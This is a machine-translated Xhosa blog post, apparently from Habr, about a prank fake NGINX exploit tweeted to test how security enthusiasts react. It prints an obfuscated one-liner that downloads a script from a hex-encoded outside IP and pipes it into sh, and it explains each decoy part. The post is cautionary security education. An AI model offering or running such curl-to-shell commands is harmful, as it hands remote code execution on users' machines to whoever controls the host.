Phawula. transl.: inqaku lokuqala, elipapashwe ngoJuni 1, lagqiba ekubeni liqhube uvavanyo phakathi kwabo banomdla kukhuseleko lolwazi. Ukwenza oku, walungiselela ukuxhaphazwa okungeyonyani kobuthathaka obungachazwanga kwiseva yewebhu kwaye wayithumela kwi-Twitter yakhe. Iingcamango zakhe - ukuba zibonakaliswe ngokukhawuleza ziingcali eziza kubona inkohliso ecacileyo kwikhowudi - kungekhona nje ukuba ayifezekanga ... Badlula konke okulindelweyo, kwaye kwelinye icala: i-tweet ifumene inkxaso enkulu kubantu abaninzi abangazange baphumelele. khangela imixholo yayo.
TL; DR: Musa ukusebenzisa umbhobho wefayile kwi-sh okanye kwi-bash phantsi kwayo nayiphi na imeko. Le yindlela entle yokuphulukana nolawulo lwekhompyuter yakho.
Ndifuna ukwabelana nawe ngebali elifutshane malunga nokuxhaphaza kwe-PoC ehlekisayo eyenziwe nge-31 kaMeyi. Wavela ngoko nangoko ephendula iindaba ezivela , ilungu (ZDI), olo lwazi malunga nobungozi kwi-NGINX ekhokelela kwi-RCE (ukusetyenziswa kwekhowudi ekude) ngokukhawuleza iya kuchazwa. Ekubeni i-NGINX inika amandla iiwebhusayithi ezininzi, iindaba kufuneka zibe yibhombu. Kodwa ngenxa yokulibaziseka kwinkqubo "yokubhengezwa okunoxanduva", iinkcukacha zento eyenzekayo zazingaziwa - le yinkqubo ye-ZDI eqhelekileyo.
malunga nokubhengezwa kobuthathaka kwi-NGINX
Ukugqiba kwam ukusebenza kubuchule obutsha be-obfuscation kwi-curl, ndacaphula i-tweet yokuqala kwaye "ndivuza i-PoC esebenzayo" ebandakanya umgca omnye wekhowudi ekucingelwa ukuba ixhaphaza ubungozi obufunyenweyo. Kakade ke, oku yayibubudenge obupheleleyo. Ndicinge ukuba ndiza kubhengezwa kwangoko, kwaye kungcono ndifumane iiretweets ezimbalwa (oh kulungile).
ngenkohliso
Noko ke, andizange ndiyicinge into eyenzekayo emva koko. Ukuthandwa kwetweet yam kuye kwanda. Okumangalisa kukuba, okwangoku (15:00 ixesha laseMoscow ngoJuni 1) abantu abambalwa baye baqaphela ukuba oku kuyinkohliso. Abantu abaninzi bayayiphinda ngaphandle kokuyijonga kwaphela (singasathethi ke ngokuncoma imizobo ethandekayo ye-ASCII eyivelisayo).
Jonga nje indlela entle ngayo!
Ngelixa zonke ezi loops kunye nemibala mihle, kucacile ukuba abantu bekufuneka baqhube ikhowudi kumatshini wabo ukuze bazibone. Ngethamsanqa, izikhangeli zisebenza ngendlela efanayo, kwaye zidityaniswe nenyaniso yokuba andizange ndifune ukungena engxakini yomthetho, ikhowudi engcwatywe kwindawo yam yayisenza iifowuni ze-echo ngaphandle kokuzama ukufaka okanye ukwenza nayiphi na ikhowudi eyongezelelweyo.
Ukuhamba kancinci: , , mna kunye nabanye abafana kwiqela Besidlala ngeendlela ezahlukeneyo zokufihla imiyalelo ye-curl okwethutyana ngoku kuba ipholile ... kwaye singama geeks. I-netspooky kunye ne-dnz yafumanisa iindlela ezininzi ezintsha ezazibonakala zithembisa kakhulu kum. Ndizibandakanye kulonwabo kwaye ndazama ukongeza iinguqulelo zedesimali ye-IP kwingxowa yamaqhinga. Kuyavela ukuba i-IP ingaguqulelwa kwifomathi ye-hexadecimal. Ngapha koko, i-curl kunye nezinye izixhobo ze-NIX zitya ngokonwaba i-hexadecimal IPs! Ke ibingumcimbi nje wokwenza umgca womyalelo oqinisekisayo nokhuselekileyo. Ekugqibeleni ndiyifumene le nto:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostUbunjineli be-Socio-electronic (SEE) - ngaphezu kokukhwabanisa
Ukhuseleko kunye nokuqhelana yayiyinxalenye enkulu yolu vavanyo. Ndicinga ukuba zizo ezikhokelele kwimpumelelo yakhe. Umgca womyalelo ubonisa ngokucacileyo ukhuseleko ngokubhekisa kwi-"127.0.0.1" (i-localhost eyaziwayo). I-Localhost ithathwa njengekhuselekile kwaye idatha ekuyo ayishiyi ikhompyuter yakho.
Ukuqhelana kwakusisitshixo sesibini KHANGELA icandelo lovavanyo. Ekubeni abaphulaphuli ekujoliswe kubo ngokuyinhloko baqulethwe ngabantu abaqhelana neziseko zokhuseleko lwekhompyutheni, kwakubalulekile ukwenza ikhowudi ukuze iinxalenye zayo zibonakale ziqhelekile kwaye ziqhelekile (kwaye ngoko zikhuselekile). Izinto ezibolekayo zeekhonsepthi zakudala zokuxhaphaza kunye nokuzidibanisa ngendlela engaqhelekanga kungqineke kuyimpumelelo enkulu.
Ngezantsi uhlalutyo olucacileyo lwe-line-liner. Yonke into ekolu luhlu iyanxiba indalo yezithambiso, kwaye akukho nto ifunekayo ekusebenzeni kwayo.
Ngawaphi amacandelo ayimfuneko ngokwenene? Oku -gsS, -O 0x0238f06a, |sh kunye neseva yewebhu ngokwayo. Umncedisi we web akaqulathanga miyalelo engalunganga, kodwa unike ngokulula imizobo ye ASCII usebenzisa imiyalelo echo kwiskripthi esiqulethwe kuyo index.html. Xa umsebenzisi efake umgca nge |sh esiphakathini, index.html ilayishiwe kwaye yenziwe. Ngethamsanqa, abagcini bomncedisi wewebhu babengenanjongo zimbi.
-
../../../%00β imele ukuya ngaphaya koluhlu; -
ngx_stream_module.so- indlela eya kwimodyuli ye-NGINX engahleliwe; -
/bin/sh%00<'protocol:TCP'-kucingelwa ukuba siyaqalisa/bin/shkumatshini ekujoliswe kuwo kwaye uqondise kwakhona imveliso kwitshaneli ye-TCP; -
-O 0x0238f06a#PLToffset- isithako esiyimfihlo, esongezelelweyo#PLToffset, ukujongeka njengesixhobo sokucima inkumbulo ngandlela ithile equlethwe kwi PLT; -
|sh;- enye iqhekeza elibalulekileyo. Besidinga ukuqondisa kwakhona imveliso kwi sh/bash ukuze siphumeze ikhowudi evela kumncedisi wewebhu ohlaselayo obekwe kwa0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- idummy apho inetcat ibhekisa kuyo/dev/tcp/localhostukuze yonke into ibonakale ikhuselekile kwakhona. Enyanisweni, ayenzi nto kwaye ifakwe kumgca wobuhle.
Oku kuqukumbela ukucazululwa komgca omnye wescript kunye nengxoxo yemiba "yobunjineli bezentlalo-elektroniki" (iphishing entsonkothileyo).
Uqwalaselo lweSeva yeWebhu kunye nemilinganiselo yokuBilisa
Ekubeni uninzi lwababhalisi bam be-infosec / hackers, ndaye ndagqiba ekubeni ndenze iseva yewebhu ixhathise ngakumbi kwiinkcazo "zomdla" kwicala labo, ukuze abafana babe nento yokwenza (kwaye kuya kuba mnandi Misela). Andizukudwelisa yonke imigibe apha kuba uvavanyo lusaqhubeka, kodwa nazi izinto ezimbalwa ezenziwa ngumncedisi:
- Ijonga ngenkuthalo iinzame zokusasaza kwiinethiwekhi zentlalo ezithile kwaye ithathela indawo izithonjana ezahlukeneyo zokujonga kwangaphambili ukukhuthaza umsebenzisi ukuba acofe kwikhonkco.
- Ikwalathisa iChrome/Mozilla/Safari/njl kwividiyo yentengiso yeThugcrowd endaweni yokubonisa umbhalo weqokobhe.
- Iiwotshi zeempawu EZIQHELEKILEYO zokungena/ukugqekeza ngokuphandle, kwaye emva koko iqalise ukuthumela izicelo kwiiseva ze-NSA (ha!).
- Ifakela iTrojan, kunye ne-rootkit ye-BIOS, kuzo zonke iikhomputha abasebenzisi abatyelela umkhosi ukusuka kwisikhangeli esiqhelekileyo (ukudlala nje!).
Inxalenye encinci ye-antimers
Kule meko, injongo yam kuphela yayikukwazi ezinye zeempawu ze-Apache - ngokukodwa, imithetho epholileyo yokubuyisela izicelo - kwaye ndacinga: kutheni kungenjalo?
I-NGINX Exploit (Inyani!)
Rhuma kwi kwi-Twitter kwaye ulandele umsebenzi omkhulu we-ZDI ekujonganeni nobuthathaka bokwenyani kunye nokuxhaphaza kwi-NGINX. Umsebenzi wabo ubusoloko undithakazelisa kwaye ndiyambulela u-Alice ngomonde wakhe ngazo zonke izinto ezikhankanyiweyo kunye nezaziso ezibangelwe yitweet yam. Ngethamsanqa, yenze okulungileyo: yanceda ukwazisa ngobuthathaka be-NGINX, kunye neengxaki ezibangelwa kukusetyenziswa kakubi kwe-curl.
umthombo: www.habr.com